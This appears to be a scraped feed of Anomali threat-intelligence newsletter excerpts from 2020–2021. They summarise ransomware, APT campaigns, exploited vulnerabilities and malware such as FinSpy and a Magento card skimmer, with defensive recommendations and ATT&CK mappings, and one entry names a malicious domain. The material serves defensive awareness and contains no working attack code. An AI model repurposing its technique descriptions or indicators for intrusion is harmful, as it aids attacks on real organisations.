Analyst Comment: In light of the increasing frequency and sophistication of supply chain attacks, companies should carefully audit, examine, and include in their threat modelling means of mitigating and detecting third party compromises. A resilient and tested backup and restore policy is an important part of the overall security strategy.
Tags: North America, Codecov, supply chain
FBI Teams up with ‘Have I Been Pwned’ to Alert Emotet Victims
(published: April 30, 2021)
The FBI has shared more than 4.3 million email addresses with data breach tracking site Have I Been Pwned. The data breach notification site allows you to check if your login credentials may have been compromised by Emotet. In total, 4,324,770 email addresses were provided which span a wide range of countries and domains. The addresses are actually sourced from 2 separate corpuses of data obtained by the agencies.
Analyst Comment: Frequently updated endpoint detection policies as well as network security |
Ransomware Data Breach Malware Tool Vulnerability Threat Patching Guideline | ||
|
2021-04-27 17:24:00 | Anomali Cyber Watch: HabitsRAT Targeting Linux and Windows Servers, Lazarus Group Targetting South Korean Orgs, Multiple Zero-Days and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Android Malware, RATs, Phishing, QLocker Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Zero-day Vulnerabilities in SonicWall Email Security Actively Exploited
(published: April 21, 2021)
US cybersecurity company SonicWall said fixes have been published to resolve three critical issues in its email security solution that are being actively exploited in the wild. The vulnerabilities are tracked as CVE-2021-20021, CVE-2021-20022, and CVE-2021-20023, impacting SonicWall ES/Hosted Email Security (HES) versions 10.0.1 and above.
Analyst Comment: The patches for these vulnerabilities have been issued and should be applied as soon as possible to avoid potential malicious behaviour. SonicWall’s security notice can be found here https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/. It is important that your company has patch-maintenance policies in place. Once a vulnerability has been publicly reported,, threat actors will likely attempt to incorporate the exploitation of the vulnerability into their malicious operations. Patches should be reviewed and applied as soon as possible to prevent potential malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Remote File Copy - T1105 | [MITRE ATT&CK] File and Directory Discovery - T1083
Tags: CVE-2021-20021, CVE-2021-20023, CVE-2021-20022
Massive Qlocker Ransomware Attack Uses 7zip to Encrypt QNAP Devices
(published: April 21, 2021)
The ransomware is called Qlocker and began targeting QNAP devices on April 19th, 2021. All victims are told to pay 0.01 Bitcoins, which is approximately $557.74, to get a password for their archived files. While the files are being locked, the Resource Monitor will display numerous '7z' processes which are the 7zip command-line executable.
Analyst Comment: Attackers are using legitimate tools like 7zip to evade detections by traditional antiviruses. EDR solutions can help tracking suspicious command line arguments and process creations to potentially detect such attacks. Customers should use backup solutions to be able recover encrypted files.
MITRE ATT&CK: [MITRE ATT&CK] Credentials in Files - T1081
Tags: Tor, Qlocker, CVE-2020-2509, CVE-2020-36195
Novel Email-Based Campaign Targets Bloomberg Clients with RATs
(published: April 21, 2021)
A new e-mail-based campaign by an emerging threat actor aims to spread various remote access trojans (RATs) to a very specific group of targets who use Bloomberg's industry-based services. Attacks start in the form of targeted emails to c |
Ransomware Malware Tool Vulnerability Threat Medical | Wannacry Wannacry APT 38 APT 28 | |
|
2021-04-20 19:12:00 | Anomali Cyber Watch: Criminals Target Would Be Hackers for Cryptocurrency Theft, A Zero Day Vulnerability in Windows Desktop Manager is in the Wild, US Blames Russia for SolarWinds, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android Malware, Dependency Confusion, Ransomware, Russia, SaintBot and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
HackBoss Malware Poses as Hacker Tools on Telegram to Steal Digital Coins
(published: April 16, 2021)
The authors of a cryptocurrency-stealing malware are distributing it over Telegram to aspiring cybercriminals under the guise of free malicious applications. Researchers have named the malware HackBoss and say that its operators likely stole more than $500,000 from wannabe hackers that fell for the trick. The malware is designed to simply check the clipboard for a cryptocurrency wallet and replace it with one belonging to the attacker.
Analyst Comment: Messages that attempt to get a user to click a link should be viewed with scrutiny, especially when they come from individuals with whom you do not typically communicate. Education is the best defense. Users should be educated on the dangers of phishing, specifically, how they can take place in different forms of online communications, and whom to contact if a phishing attempt is identified.
MITRE ATT&CK: [MITRE ATT&CK] Clipboard Data - T1115 | [MITRE ATT&CK] Software Packing - T1045
Tags: Dogecoin, Cryptocurrency, Cryptostealer, Telegram, HackBoss
Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Harvesting of Credentials
(published: April 15, 2021)
The recently discovered and patched Microsoft Exchange vulnerabilities have garnered considerable attention due to their mass exploitation and the severity of impact each exploitation has on the affected organization. On March 6, 2021, an unknown actor exploited vulnerabilities in Microsoft Exchange Server to install a webshell on a server at a financial institution in the EMEA (Europe, the Middle East and Africa) region. The actor then compressed the files associated with the information gathering and credential harvesting.
Analyst Comment: Once a vulnerability has been reported on in open sources, threat actors will likely attempt to incorporate the exploitation of the vulnerability into their malicious operations. Patches should be reviewed and applied as soon as possible to prevent potential malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Data Compressed - T1002 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Account Discovery - T1087 | [MITRE ATT&CK] Web Shell - T1100 | [MITRE ATT&CK] PowerShell - T1086 | |
Ransomware Malware Vulnerability Threat | ||
|
2021-04-13 15:49:00 | Anomali Cyber Watch: Android Malware, Government, Middle East and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cobalt Group, FIN6, NetWalker, OilRig, Rocke Group, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Iran’s APT34 Returns with an Updated Arsenal
(published: April 8, 2021)
Check Point Research discovered evidence of a new campaign by the Iranian threat group APT34. The threat group has been actively retooling and updating its payload arsenal to try and avoid detection. They have created several different malware variants whose ultimate purpose remained the same, to gain the initial foothold on the targeted device.
Analyst Comment: Threat actors are always innovating new methods and update tools used to carry out attacks. Always practice Defense in Depth (do not rely on single security mechanisms - security measures should be layered, redundant, and failsafe).
MITRE ATT&CK: [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Exploitation of Remote Services - T1210 | [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] Custom Cryptographic Protocol - T1024 | [MITRE ATT&CK] Web Service - T1102 | [MITRE ATT&CK] Remote File Copy - T1105 | [MITRE ATT&CK] Scripting - T1064
Tags: OilRig, APT34, DNSpionage, Lab Dookhtegan, TONEDEAF, Dookhtegan, Karkoff, DNSpionage, Government, Middle East
New Wormable Android Malware Spreads by Creating Auto-Replies to Messages in WhatsApp
(published: April 7, 2021)
Check Point Research recently discovered Android malware on Google Play hidden in a fake application that is capable of spreading itself via users’ WhatsApp messages. The malware is capable of automatically replying to victim’s incoming WhatsApp messages with a payload received from a command-and-control (C2) server. This unique method could have enabled threat actors to distribute phishing attacks, spread false information or steal credentials and data from users’ WhatsApp accounts, and more.
Analyst Comment: Users’ personal mobile has many enterprise applications installed like Multifactor Authenticator, Email Client, etc which increases the risk for the enterprise even further. Users should be wary of download links or attachments that they receive via WhatsApp or other messaging apps, even when they appear to come from trusted contacts or messaging groups. The latest security patches should be installed for both applications and the operating system.
Tags: Android, FlixOnline, WhatsApp
|
Ransomware Malware Vulnerability Threat Guideline | APT 34 | |
|
2021-04-06 16:57:00 | Anomali Cyber Watch: APT Groups, Data Breach, Malspam, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT10, Charming Kitten, China, Cycldek, Hancitor, Malspam, North Korea, Phishing, TA453, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
The Leap of a Cycldek-Related Threat Actor
(published: April 5, 2021)
A new sophisticated Chinese campaign was observed between June 2020 and January 2021, targeting government, military and other critical industries in Vietnam, and, to lesser extent, in Central Asia and Thailand. This threat actor uses a "DLL side-loading triad" previously mastered by another Chinese group, LuckyMouse: a legitimate executable, a malicious DLL to be sideloaded by it, and an encoded payload, generally dropped from a self-extracting archive. But the code origins of the new malware used on different stages of this campaign point to a different Chinese-speaking group, Cycldek.
Analyst Comment: Malware authors are always innovating new methods of communicating back to the control servers. Always practice Defense in Depth (do not rely on single security mechanisms - security measures should be layered, redundant, and failsafe).
MITRE ATT&CK: [MITRE ATT&CK] DLL Side-Loading - T1073 | [MITRE ATT&CK] File Deletion - T1107
Tags: Chinese-speaking, Cycldek-related
Hancitor’s Use of Cobalt Strike and a Noisy Network Ping Tool
(published: April 1, 2021)
Hancitor is an information stealer and malware downloader used by a threat actor designated as MAN1, Moskalvzapoe or TA511. Initial infection includes target clicking malspam, then clicking on a link in an opened Google Docs page, and finally clicking to enable macros in the downloaded Word document. In recent months, this actor began using a network ping tool to help enumerate the Active Directory (AD) environment of infected hosts. It generates approximately 1.5 GB of Internet Control Message Protocol (ICMP) traffic.
Analyst Comment: Organizations should use email security solutions to block malicious/spam emails. All email attachments should be scanned for malware before they reach the user's inbox. IPS rules need to be configured properly to identify any reconnaissance attempts e.g. port scan to get early indication of potential breach.
MITRE ATT&CK: [MITRE ATT&CK] Remote System Discovery - T1018 | [MITRE ATT&CK] Remote Access Tools - T1219 | [MITRE ATT&CK] Rundll32 - T1085 | [MITRE ATT&CK] Standard Application Layer Protocol - T1071 | [MITRE ATT&CK] System Information Discovery - T1082
Tags: Hancitor, Malspam, Cobalt Strike
|
Malware Tool Vulnerability Threat Conference | APT 35 APT 10 | |
|
2021-04-01 06:52:00 | Bahamut Possibly Responsible for Multi-Stage Infection Chain Campaign (lien direct) | Authored by: Gage Mele, Tara Gould, Winston Marydasan, and Yury Polozov
Key Findings
Anomali Threat Research discovered cyberthreat actors distributing malicious documents exploiting a vulnerability (CVE-2017-8570) during a multi-stage infection chain to install a Visual Basic (VB) executable on target machines.
This exploitation creates a backdoor that appears to only retrieve an infected machine’s username, possibly indicating reconnaissance activity.
We assess with low confidence, based on limited technical intelligence and targeting consistent with previously observed activity, that the advanced persistent threat (APT) cyberespionage group known as Bahamut may be responsible for this campaign.
Bahamut is a “group for hire” and typically targets entities and individuals in the Middle East and South Asia with spearphishing messages and fake applications as the initial infection vector.
Overview
Based on a discovery in mid-February 2021, Anomali Threat Research assesses with low confidence that the APT cyberespionage group-for-hire Bahamut has been conducting malicious activity against multiple targets since at least June 4, 2020. While researching malicious files, our researchers analyzed a .docx file (List1.docx) that contained a shared bundled component with another .docx file that was communicating via template injection with lobertica.info, a domain previously attributed to Bahamut.[1] Further analysis of this file and the infection chain it follows is provided in subsequent sections below.
The header dates of a template injection domain (lobertica.info/fefus/template.dot) contacted by Screeshot from NACTA Website.docx (including “Screeshot” spelling error) indicated malicious activity dating back to at least June 4, 2020. The title of the document may be a reference to Pakistan’s National Counter Terrorism Authority (NACTA), which would be consistent with Bahamut’s previous targeting and geographical location. The June timeframe also aligns with Pakistan’s virtual meeting with the Financial Action Task Force (Groupe d'Action Financière) held on June 24, 2020, which resulted in keeping Pakistan on the financial grey list for terrorism funding.[2] Additionally, in June 2020, between the 9th and 15th, the United Arab Emirates (UAE) and Pakistan conducted repatriation flights for Pakistani nationals in the UAE. And, as of June 29, the UAE suspended passengers from Pakistan, until more COVID-19-related facilities could be created.[3] While the timing may be coincidental, sophisticated threat actors such as Bahamut are known to use real-world events as themes for targeted cyber campaigns. Historically, in December 2016, Bahamut reportedly targeted human rights activists in the Middle East with spearphishing attacks to deliver Android-based malware, this persisted through 2018, with the targeting of entities and individuals in Egypt, Iran, India, Pakistan, Palestine, Qatar, Tunisia, and the UAE.[4]
Details
Anomali Threat Research identified malicious .docx files that exploit a remote code execution (RCE) vulnerability (CVE-2017-8570). The activity apparently began in June 2020 and continued through at least mid-February 2021. The actors used at least three files with generic names: List1.docx, List for Approval.docx, and report.doc, and one appearing to employ a NACTA theme with a typo: Screeshot from NACTA Website.docx. (Figure 1)
Figure 1 – Infection Chain
Technical Analysis
Threat actors distributed .docx files with the objective of dropping a rich text format (RTF) file |
Malware Vulnerability Threat | Bahamut | |
|
2021-03-30 17:07:00 | Anomali Cyber Watch: Malware, Phishing, Ransomware and More. (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: BlackKingdom, Chrome Extensions, Microsoft, REvil, PurpleFox, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Google removes privacy-focused ClearURLs Chrome extension
(published: March 24, 2021)
Researchers at Cato Networks have discovered two dozen malicious Google Chrome browser extensions and 40 associated malicious domains that were previously unidentified. Some extensions were found to steal users’ names and passwords, whilst others were stealing financial data. Spoofed extensions posing as legitimate ones were common, amongst them a fake ‘Postman’ extension harvesting companies API credentials to target company applications. The security vendor discovered the extensions on networks belonging to hundreds of its customers and found that they were not being flagged as malicious by endpoint protection tools and threat intelligence systems. Malicious extensions have been previously used in malicious campaigns, in 2020 researchers from Awake Security discovered over 100 malicious extensions engaged in a global campaign to steal credentials, take screenshots, and carry out other malicious activity. It was estimated that there were at least 32 million downloads of the malicious extensions.
Analyst Comment: This story illustrates the complexities of using modern life as Google is a monolithic corporation that is integrated into everyone’s daily lives, both personal and business. Whilst many may find it difficult to do much without Google, the cost of using this software can often be your own privacy. Users should be aware that Google’s policies and usage of your data is not malicious and is perfectly legal but you are giving up your information. If something is free, you are the product.
Tags: Google, Chrome, browser extension, privacy, Firefox, ClearURL
Purple Fox Malware Targets Windows Machines With New Worm Capabilities
(published: March 24, 2021)
Purple Fox, which first appeared in 2018, is an active malware campaign that targeted victims through phishing and exploit kits, it required user interaction or some kind of third-party tool to infect Windows machines. However, the attackers behind the campaign have now upped their game and added new functionality that can brute force its way into victims' systems on its own, according to new research from Guardicore Labs. The researchers identified a new infection vector through Server Message Block (SMB) password brute force and the addition of a rootkit, allowing the actors to hide the malware on a machine making it more difficult to detect and remove. Purple Fox is believed to have compromised around 3,000 servers, the vast majority of which were old versions of Windows Server IIS version 7.5. It was very active in Spring and Summer 2020 before going quiet and then ramping up activity in early 2021.
Analyst Comment: Malware authors are always innovating new methods of communicating back to the control servers. Always practice Defense in Depth (do not rely on single security mechanisms - security measures should be layered, redundant, and failsafe).
MITRE ATT&CK: |
Ransomware Malware Tool Vulnerability Threat | ||
|
2021-03-17 18:03:00 | Anomali Cyber Watch: APT, Ransomware, Vulnerabilities and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, AlientBot, Clast82, China, DearCry, RedXOR, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Google: This Spectre proof-of-concept shows how dangerous these attacks can be
(published: March 15, 2021)
Google has released a proof of concept (PoC) code to demonstrate the practicality of Spectre side-channel attacks against a browser's JavaScript engine to leak information from its memory. Spectre targeted the process in modern CPUs called speculative execution to leak secrets such as passwords from one site to another. While the PoC demonstrates the JavaScript Spectre attack against Chrome 88's V8 JavaScript engine on an Intel Core i7-6500U CPU on Linux, Google notes it can easily be tweaked for other CPUs, browser versions and operating systems.
Analyst Comment: As the density of microchip manufacturing continues to increase, side-channel attacks are likely to be found across many architectures and are difficult (and in some cases impossible) to remediate in software. The PoC of the practicality of performing such an attack using javascript emphasises that developers of both software and hardware be aware of these types of attacks and the means by which they can be used to invalidate existing security controls.
Tags: CVE-2017-5753
Threat Assessment: DearCry Ransomware
(published: March 12, 2021)
A new ransomware strain is being used by actors to attack unpatched Microsoft Exchange servers. Microsoft released patches for four vulnerabilities that are being exploited in the wild. The initial round of attacks included installation of web shells onto affected servers that could be used to infect additional computers. While the initial attack appears to have been done by sophisticated actors, the ease and publicity around these vulnerabilities has led to a diverse group of actors all attempting to compromise these servers.
Analyst Comment: Patch and asset management are a critical and often under-resourced aspect of defense in depth. As this particular set of vulnerabilities and attacks are against locally hosted Exchange servers, organization may want to assess whether a hosted solution may make sense from a risk standpoint
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted - T1022 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Email Collection - T1114 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] System Service Discovery - T1007 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | |
Ransomware Tool Vulnerability Threat Guideline | Wannacry APT 41 APT 34 | |
|
2021-03-16 15:07:00 | An Intelligence-Driven Approach to Extended Detection and Response (XDR) (lien direct) | Threat detection isn’t getting any easier. Today’s threat actors are escalating the number of attacks they launch, going after more targets, using increasingly sophisticated techniques, and achieving their goals through surreptitiousness – not notoriety. With more than 2,000 security vendors catalogued and organizations reporting an average of 45 security solutions deployed, why aren’t we any closer to solving the threat detection gap? To answer this question, we first need to ask, what are we trying to achieve? For years now, we have known that the “whack-a-mole” approach of detecting discrete threats is at best a stopgap for the next inevitable attack. At a high level, most would likely agree that the always-shifting nature of adversaries, emergence of new vulnerabilities and exploits, and the all-menacing “zero day” leads to the continued proliferation of incidents ranging across data breaches, ransomware, and cyberespionage, etc. As soon as we close one door to attackers, they find and open another. This has always been the case. There’s more to this though. We think some of the answer can be found in the failure to fully optimize and connect existing tools, processes, and people to give them broader visibility over traffic and threats moving in and out of their networks while seamlessly layering in detection and response capabilities. As we were told in a recent discussion with an industry analyst, “We’ve reached an inflection point.” Enterprises know that the resources needed to greatly improve their security operations exist, they are now hungry to start using them to their maximum potential.” In other words, “We know the goods are available, how do we start using them to better find and neutralize the bad actors?” Enter Extended Detection and Response (XDR) You may have noticed lately that XDR is white hot in the security world. Scores of vendors are entering the fray — ranging across small startups to established 800-pound gorillas. Dozens of industry analysts are quickly validating XDR as more than just a buzzword, with Garter adding XDR to the “innovation trigger” on the newly created Security Operations Hype Cycle. As a long-time member of the security technology community, I can add that while we have certainly seen enthusiasm for trends at different periods, the level that XDR is generating reminds me of three other significant movements that changed the course of computing and security. The first was for Security Event and Information Management (SIEM), which I experienced during my time as a founder at ArcSight. The second was during the “big data” era. The third was for “cloud,” which in many ways has been reinvigorated due to COVID. XDR: What is it? Multiple definitions exist. We think of XDR as an architecture and in terms of how enterprises can leverage it to maximize the performance of their overall security investment (people, technologies, services) to take action against threats at the fastest possible speed. As leaders in the threat intelligence market and with deference to the essential role that global threat intelligence plays in accelerating detection and response, we offer up the following working definition: Organizations that run on top of XDR architectures are able to move closer to managing their security infrastructure as an integrated, unified platform. With XDR, Security Operations Centers (SOCs) can break silos to converge all security data and telemetry collected and generated by security technologies they’ve deployed (tech that includes firewalls, EDR, CASB, SIEM, SOAR, TIP etc.). With this information, they can generate strategic threat intelligence that empowers | Vulnerability Threat Patching Guideline | ||
|
2020-10-06 14:00:00 | Weekly Threat Briefing: Ransomware, IPStorm, APT Group, and More (lien direct) |
The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, BlackTech, BLINDINGCAN, Linux Malware, Palmerworm, Vulnerabilities, and XDSpy. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Grindr Fixed a Bug Allowing Full Takeover of Any User Account
(published: October 3, 2020)
Grindr, an LGBT networking platform, has fixed a vulnerability that could allow any account to be hijacked. The vulnerability was identified by security researcher Wassime Bouimadaghene, finding that the reset token was leaked in the page’s response content. This would enable anyone who knows a users’ email address to generate the reset link that is sent via email. Gaining account access would enable an attacker to obtain sensitive information such as pictures stored on the app (including NSFW), HIV status, location, and messages. Grindr has announced a bug bounty program.
Recommendation: If your account has been breached, you can reset the password using the reset link sent to the associated email address.
Tags: Browser, Exposed tokens, Grindr, Sensitive Info
XDSpy: Stealing Government Secrets Since 2011
(published: October 2, 2020)
Security researchers from ESET have identified a new Advanced Persistent Threat (APT) group that has been targeting Eastern European governments and businesses for up to nine years. Dubbed “XDSpy,” ESET was unable to identify any code similarity or shared infrastructure with other known groups and believe the group operates in a UTC+2 or UTC+3 time zone, Monday to Friday. XDSpy mainly uses spearphishing emails with some variance, some will contain attachments or links to malicious files, usually a ZIP or RAR archive. When the malicious file has infected a victim, it will install “XDDown,” a downloader that will begin to install additional plugins that will begin to exfiltrate files, passwords, and nearby SSIDs. XDSpy has also been observed using “CVE-2020-0968” (Internet Explorer legacy JavaScript vulnerability) bearing some resemblance to DarkHotel campaigns and Operation Domino, ESET do not believe these campaigns are related but may be using the same exploit broker.
Recommendation: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] System Owner/User Discovery - T1033 | [MITRE ATT&CK] System Information Discovery - T1082 | [MITRE ATT&CK] System Information Discovery - T1082 | [MITRE ATT&CK] File and Directory Discovery |
Ransomware Malware Vulnerability Threat Medical | APT 38 | ★★★★★ |
|
2020-09-29 14:00:00 | Weekly Threat Briefing: Federal Agency Breach, Exploits, Malware, and Spyware (lien direct) |
The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Cyber Espionage, FinSpy, Magento, Taurus Project and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
German-made FinSpy Spyware Found in Egypt, and Mac and Linux Versions Revealed
(published: September 25, 2020)
Security Researchers from Amnesty International have identified new variants of FinSpy, spyware that can access private data and record audio/video. While used as a law enforcement tool, authoritarian governments have been using FinSpy to spy on activists and dissidents. Spreading through fake Flash Player updates, the malware is installed as root with use of exploits, and persistence is gained by creating a logind.pslist file. Once a system is infected with the malware, it has the ability to run shell scripts, record audio, keylogging, view network information, and list files. Samples have been found of FinSpy for macOS, Windows, Android, and Linux.
Recommendation: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from threat actors, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.
MITRE ATT&CK: [MITRE ATT&CK] Logon Scripts - T1037 | [MITRE ATT&CK] Standard Application Layer Protocol - T1071
Tags: Amnesty, Android, Backdoor, Linux, macOS, FinSpy, Spyware
Magento Credit Card Stealing Malware: gstaticapi
(published: September 25, 2020)
Security researchers, at Sucuri, have identified a malicious script, dubbed “gstaticapi,” that is designed to steal payment information from Magento-based websites. The script first attempts to find the “checkout” string in a web browser URL and, if found, will create an element to the web pages header. This allows the JavaScript to handle external code-loading capabilities that are used to process the theft of billing and payment card information.
Recommendation: Sometimes webmasters discover that one of their sites has been compromised months after the initial infection. Websites, much like personal workstations, require constant maintenance and upkeep in order to adapt to the latest threats. In addition to keeping server software up to date, it is critical that all external-facing assets are monitored and scanned for vulnerabilities. The ability to easily restore from backup, incident response planning, and customer communication channels should all be established before a breach occurs.
MITRE ATT&CK: [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Data Encoding - T1132
T |
Data Breach Malware Vulnerability Threat | APT 19 | ★★★★★ |
|
2020-09-22 15:00:00 | Weekly Threat Briefing: Android Malware, APT Groups, Election Apps, Ransomware and More (lien direct) |
The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Cerberus Source Code Leak, Chinese APT, Mrbminer Malware, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
US 2020 Presidential Apps Riddled with Tracking and Security Flaws
(published: September 17, 2020)
The Vote Joe 2020 application has been found to be potentially leaking personal data about voters. The app is used by the Joe Biden campaign to engage with voters and get supporters to send out promotional text messages. Using TargetSmart, an intelligence service, the app receives their predictions via API endpoint which has been found to be returning additional data. Voter preference and voter prediction could be seen, while voter preference is publically accessible, the information for TargetSmart was not meant to be publicly available. The app also let users from outside of the United States download, allowing for non-US citizens to have access to the data, as there was no email verification. Vote Joe isn’t the only campaign app with security issues, as the Donald Trump application exposed hardcoded secret keys in the APK.
Recommendation: The exposure of Personally Identifiable Information (PII) requires affected individuals to take precautionary measures to protect their identity and their finances. Identity theft services can assist in preventing illicit purchases, or applying for financial services from taking place by actors using stolen data.
Tags: APK, Android, Campaign, Election, Joe Biden, PII
German Hospital Attacked, Patient Taken to Another City Dies
(published: September 17, 2020)
A failure in IT systems at Duesseldorf University Hospital in Germany has led to the death of a woman. In an apparent ransomware attack, the hospital’s systems crashed with staff unable to access data. While there was no apparent ransom note, 30 servers at the hospital had been encrypted last week, with a ransom note left on one server addressed to Heinrich Heine University. Duesseldorf police contacted the perpetrators to inform them they had attacked the hospital instead of the university, with the perpetrators providing decryption keys, however patients had to be rerouted to other hospitals and therefore a long time before being treated by doctors.
Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications provided by trusted vendors should also be employed. Emails that are received from unknown senders should be carefully avoided, and attachments from such senders should not be opened. Furthermore, it is important to have a comprehensive and tested backup solution in place, in addition to a business continuity plan for the unfortunate case of ransomware infection.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Germany, Healthcare, Hospital, Ransomware
|
Ransomware Malware Vulnerability Threat Patching Guideline | APT 41 | ★★★★★ |
|
2020-09-15 15:00:00 | Weekly Threat Briefing: APT Group, Malware, Ransomware, and Vulnerabilities (lien direct) |
The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Conti Ransomware, Cryptominers, Emotet, Linux, US Election, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
China’s ‘Hybrid War’: Beijing’s Mass Surveillance of Australia and the World for Secrets and Scandal
(published: September 14, 2020)
A database containing 2.4 million people has been leaked from a Shenzhen company, Zhenhua Data, believed to have ties to the Chinese intelligence service. The database contains personal information on over 35,000 Australians and prominent figures, and 52,000 Americans. This includes addresses, bank information, birth dates, criminal records, job applications, psychological profiles, and social media. Politicians, lawyers, journalists, military officers, media figures, and Natalie Imbruglia are among the records of Australians contained in the database. While a lot of the information is public, there is also non-public information contributing to claims that China is developing a mass surveillance system.
Recommendation: Users should always remain vigilant about the information they are putting out into the public, and avoid posting personal or sensitive information online.
Tags: China, spying
US Criminal Court Hit by Conti Ransomware; Critical Data at Risk
(published: September 11, 2020)
The Fourth District Court of Louisiana, part of the US criminal court system, appears to have become the latest victim of the Conti ransomware. The court's website was attacked and used to steal numerous court documents related to defendants, jurors, and witnesses, and then install the Conti ransomware. Evidence of the data theft was posted to the dark web. Analysis of the malware by Emsisoft’s threat analyst, Brett Callow, indicates that the ransomware deployed in the attack was Conti, which has code similarity to another ransomware strain, Ryuk. The Conti group, believed to be behind this ransomware as a service, is sophisticated and due to the fact that they receive a large portion of the ransoms paid, they are motivated to avoid detections and continue to develop advanced attacking tools. This attack also used the Trickbot malware in its exploit chain, similar to that used by Ryuk campaigns.
Recommendation: Defense in Depth, including vulnerability remediation and scanning, monitoring, endpoint protection, backups, etc. is key to thwarting increasingly sophisticated attacks. Ransomware attacks are particularly attractive to attackers due to the fact that each successful ransomware attack allows for multiple streams of income. The attackers can not only extort a ransom to decrypt the victim's files (especially in cases where the victim finds they do not have appropriate disaster recovery plans), but they can also monetize the exfiltrated data directly and/or use the data to aid in future attacks. This technique is increasingly used in supply chain compromises to build difficult to detect spearphishing attacks.
Tags: conti, ryuk, ransomware
|
Ransomware Malware Tool Vulnerability Threat Conference | APT 35 APT 28 APT 31 | ★★★ |
|
2020-09-09 16:24:00 | Weekly Threat Briefing: Skimmer, Ransomware, APT Group, and More (lien direct) | The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Baka, DDoS, Netwalker, PyVil, Windows Defender, TA413, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
‘Baka’ Javascript Skimmer Identified
(published: September 6, 2020)
